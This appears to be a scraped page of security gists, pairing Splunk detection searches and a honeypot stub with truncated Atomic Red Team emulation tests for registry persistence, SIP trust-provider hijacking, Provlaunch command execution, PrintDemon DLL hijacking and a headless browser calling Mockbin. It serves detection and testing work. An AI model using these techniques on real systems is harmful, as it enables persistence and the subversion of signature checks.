my fav one:

| tstats count from datamodel=Web.Web where 
    Web.url="*/tmui/system/user/create*" OR 
    Web.url="*/tmui/system/user/list*" OR 
    Web.url="*mgmt/tm/util/bash*" OR 
    Web.url="*/tmui/login.jsp" OR 
    Web.url="*/mgmt/shared/authn/login" OR 
    Web.url="*/mgmt/tm/auth/user/*" 
@MHaggis
MHaggis / HoneyMimiclite.py
Created October 31, 2023 18:12
You'll prob need to change line 6 or make a logs dir.
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime
import logging
current_datetime = datetime.now().strftime('%Y%m%d_%H%M%S')
log_file_name = f'logs/app_{current_datetime}.log'
class EmulatedServer(BaseHTTPRequestHandler):
    pass
@MHaggis
MHaggis / T1547.yaml
Created October 18, 2023 15:23
Atomic Red Team
- name: 'HKCU - Add Registry Key Under CurrentVersion\Windows'
  description: |
    This test attempts to add a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
    which points to a potential payload "calc.exe". This can be indicative of an attacker trying to achieve persistence or other malicious objectives.
    References:
    - https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
    - https://persistence-info.github.io/Data/windowsload.html
  supported_platforms:
  - windows
  input_arguments:
attack_technique: T1553.003
display_name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
atomic_tests:
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
  auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675
  description: |
    Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from
    https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
    the system to utilize it during signature checks, and logging said checks.
  supported_platforms:
@MHaggis
MHaggis / SIP_inputs.md
Created October 10, 2023 19:47
Inventory SIP

Place in inputs.conf and watch the SIP roll in.

# Modify for your environment. Make sure the sourcetype matches the analytic as needed.
[powershell://SubjectInterfacePackage]
script = $registryPaths = @("HKLM:\SOFTWARE\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1"); $registryPaths | ForEach-Object {Get-ChildItem -Recurse $_ | ForEach-Object {$key=$_; $props=$key.GetValueNames(); $propDataPairs=@{}; for ($i=0; $i -lt $props.Length; $i++) {$propDataPairs[$props[$i]]=$key.GetValue($props[$i])}; $outputObj=[PSCustomObject]@{Path=$key.PSPath;PSChildName=$key.PSChildName}; $propDataPairs.GetEnumerator() | ForEach-Object {Add-Member -InputObject $outputObj -NotePropertyName $_.Name -NotePropertyValue $_.Val
- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
  description: |
    Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
    - https://twitter.com/0gtweet/status/1674399582162153472
    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
    Registry keys are deleted after successful execution.
  supported_platforms:
  - windows
  executor:
    command: |
@MHaggis
MHaggis / T1574.001.yaml
Created September 20, 2023 14:40
#AtomicWednesdays T1574.001 - PrintDemon
- name: PrintDemon
  description: |
    Atomic Test to emulate PrintDemon.
    [Reference](https://github.com/BC-SECURITY/Invoke-PrintDemon)
    Also seen on TryHackMe - https://tryhackme.com/room/dllhijacking
  supported_platforms:
  - windows
  input_arguments:
    dll_path:
      description: File path for ualapi.dll
@MHaggis
MHaggis / T1564.003.yaml
Created September 13, 2023 15:46
Mockbin Atomic Test with Headless browsing
- name: Headless Browser Accessing Mockbin
  description: |
    The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.
  supported_platforms:
  - windows
  input_arguments:
    bin_id:
      description: Mockbin.org BIN ID
      type: string
      default: f6b9a876-a826-4ac0-83b8-639d6ad516ec
import requests
import os
import json
file_path = "ids.txt"
base_url = "https://mockbin.org/bin"
log_directory = "logs"
script_directory = "scripts"
if not os.path.exists(log_directory):

Original sending to Mockbin (use a new mockbin)

[byte[]]$NTLMType2 =
@(
    0x4e,0x54,0x4c,0x4d,
    0x53,0x53,0x50,0x00,
    0x02,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,
    0x00,0x28,0x00,0x00,